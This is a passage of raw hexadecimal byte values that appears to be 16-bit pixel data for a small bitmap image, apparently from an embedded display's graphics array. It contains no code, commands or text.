0XCC,0X9C,0X97,0XD6,0X3B,0XE7,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C, 0X14,0XC6,0X3B,0XE7,0X70,0XAD,0XCC,0X9C,0XCC,0X9C,0X97,0XD6,0X3B,0XE7,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XFF,0XFF,0X70,0XAD,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0X7C,0XEF,0X70,0XAD,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0XFF,0XFF,0X91,0XB5, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X3B,0XE7,0XD2,0XBD,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X0E,0XA5,0XFF,0XFF, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X70,0XAD, 0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0X0E,0XA5,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0X76,0XCE,0X35,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00, 0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X70,0XAD,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X7C,0XEF,0X70,0XAD,0XCC,0X9C,0X1A,0XE7, 0X35,0XC6,0X70,0XAD,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0X35,0XC6,0X35,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0X70,0XAD,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0XD2,0XBD,0XFF,0XFF, 0XFF,0XFF,0X3B,0XE7,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X97,0XD6,0X3B,0XE7,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0X70,0XAD, 0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X35,0XC6,0X35,0XC6, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0X70,0XAD,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X70,0XAD,0XFF,0XFF, 0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X97,0XD6, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0X70,0XAD,0XFF,0XFF,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X35,0XC6,0X35,0XC6,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X70,0XAD,0XFF,0XFF, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X70,0XAD,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C, 0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0X70,0XAD,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0X35,0XC6,0X35,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00, 0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X0E,0XA5,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0X70,0XAD,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7, 0X35,0XC6,0X0E,0XA5,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0X76,0XCE,0X35,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XFF,0XFF,0X70,0XAD,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0X70,0XAD,0XFF,0XFF,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C, 0X7C,0XEF,0X91,0XB5,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X7C,0XEF,0X91,0XB5, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X35,0XC6,0X3B,0XE7,0X70,0XAD,0XCC,0X9C,0XCC,0X9C,0X76,0XCE,0X7C,0XEF, 0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X1A,0XE7,0X35,0XC6,0XCC,0X9C,0X91,0XB5,0XFF,0XFF, 0X70,0XAD,0XCC,0X9C,0XCC,0X9C,0X97,0XD6,0X3B,0XE7,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0X35,0XC6,0X7C,0XEF,0XFF,0XFF,0XFF,0XFF,0XD8,0XDE,0X0E,0XA5,0XCC,0X9C,0XCC,0X9C, 0X97,0XD6,0X14,0XC6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X97,0XD6,0X14,0XC6,0XCC,0X9C,0XCC,0X9C,0X91,0XB5,0X7C,0XEF,0XFF,0XFF, 0XFF,0XFF,0X97,0XD6,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00, 0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X00,0X00,0X00,0X00,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X00,0X00,0X00,0X00,0X8C,0X94,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X8C,0X94,0X00,0X00, 0X00,0X00,0X48,0X6B,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X48,0X6B,0X00,0X00,0X00,0X00,0XC2,0X18, 0X8C,0X94,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0X8C,0X94,0XC2,0X18,0X00,0X00,0X00,0X00,0X00,0X00,0XC2,0X18,0X69,0X6B, 0X8C,0X94,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C, 0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0XCC,0X9C,0X8C,0X94,0X69,0X6B,0XC2,0X18, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X05,0X01,0X96,0X04,0X3E,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X3E,0X06, 0X96,0X04,0X05,0X01,0X00,0X00,0X00,0X00,0X00,0X00,0X05,0X01,0X1E,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X1E,0X06, 0X05,0X01,0X00,0X00,0X00,0X00,0X55,0X04,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X55,0X04,0X00,0X00, 0X00,0X00,0X1E,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X1E,0X06,0X00,0X00,0X00,0X00,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00, 0X00,0X00,0X7F,0X06,0X7F,0X06,0X6B,0X02,0X39,0X05,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0XF3,0X03,0XCD,0X02,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0XD7,0X04, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X2F,0X03,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X87,0X01,0XD7,0X04,0X7F,0X06,0X75,0X04,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0XCD,0X02,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06, 0X7F,0X06,0XE9,0X01,0X39,0X05,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03, 0XE9,0X01,0X7F,0X06,0X7F,0X06,0XD7,0X04,0X00,0X00,0X6B,0X02,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0XE9,0X01,0X91,0X03,0X7F,0X06,0X7F,0X06,0X7F,0X06,0XD7,0X04,0X00,0X00, 0XD7,0X04,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0XE9,0X01, 0X39,0X05,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06, 0X7F,0X06,0XCD,0X02,0X91,0X03,0X00,0X00,0X7F,0X06,0X7F,0X06,0X7F,0X06,0XE9,0X01, 0X91,0X03,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XCD,0X02,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0XE9,0X01,0X39,0X05,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06,0X00,0X00, 0X9B,0X05,0X87,0X01,0X75,0X04,0X7F,0X06,0X7F,0X06,0XE9,0X01,0X91,0X03,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0X6B,0X02,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00, 0X00,0X00,0X7F,0X06,0X7F,0X06,0XE9,0X01,0X39,0X05,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0XD7,0X04,0X25,0X01,0X7F,0X06,0XF3,0X03, 0X6B,0X02,0X7F,0X06,0X7F,0X06,0XE9,0X01,0X91,0X03,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X39,0X05,0X00,0X00,0XD7,0X04,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06, 0X7F,0X06,0XE9,0X01,0X39,0X05,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03, 0XE9,0X01,0X7F,0X06,0XCD,0X02,0X2F,0X03,0X7F,0X06,0XFD,0X05,0X00,0X00,0X7F,0X06, 0X7F,0X06,0XE9,0X01,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X87,0X01,0XD7,0X04, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0XE9,0X01, 0X39,0X05,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06, 0X25,0X01,0X9B,0X05,0X7F,0X06,0X7F,0X06,0X87,0X01,0X75,0X04,0X7F,0X06,0XE9,0X01, 0X91,0X03,0X7F,0X06,0X7F,0X06,0X00,0X00,0X39,0X05,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0XE9,0X01,0X39,0X05,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X9B,0X05,0X25,0X01,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X91,0X03,0X6B,0X02,0X7F,0X06,0XE9,0X01,0X91,0X03,0X7F,0X06, 0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00, 0X00,0X00,0X7F,0X06,0X7F,0X06,0XE9,0X01,0XD7,0X04,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X91,0X03,0X91,0X03,0X2F,0X03,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00, 0X00,0X00,0X00,0X00,0X7F,0X06,0XE9,0X01,0X91,0X03,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X00,0X00,0X75,0X04,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06, 0X7F,0X06,0XCD,0X02,0X2F,0X03,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X87,0X01, 0X75,0X04,0X25,0X01,0XF3,0X03,0X39,0X05,0X39,0X05,0X39,0X05,0X39,0X05,0X25,0X01, 0XD7,0X04,0XE9,0X01,0X91,0X03,0X7F,0X06,0X7F,0X06,0X7F,0X06,0XF3,0X03,0X25,0X01, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0XFD,0X05, 0X00,0X00,0X75,0X04,0X7F,0X06,0X7F,0X06,0X91,0X03,0X25,0X01,0X9B,0X05,0X00,0X00, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0XCD,0X02,0XCD,0X02,0XE9,0X01, 0X91,0X03,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X25,0X01,0X91,0X03,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X91,0X03,0XE9,0X01,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X9B,0X05,0XE9,0X01, 0X00,0X00,0X00,0X00,0X6B,0X02,0XFD,0X05,0XF3,0X03,0X6B,0X02,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X39,0X05,0X25,0X01,0X6B,0X02,0XF3,0X03,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0XD7,0X04,0X6B,0X02,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0XF3,0X03,0X6B,0X02,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00, 0X00,0X00,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X00,0X00,0X00,0X00,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X00,0X00,0X00,0X00,0X1E,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06,0X7F,0X06, 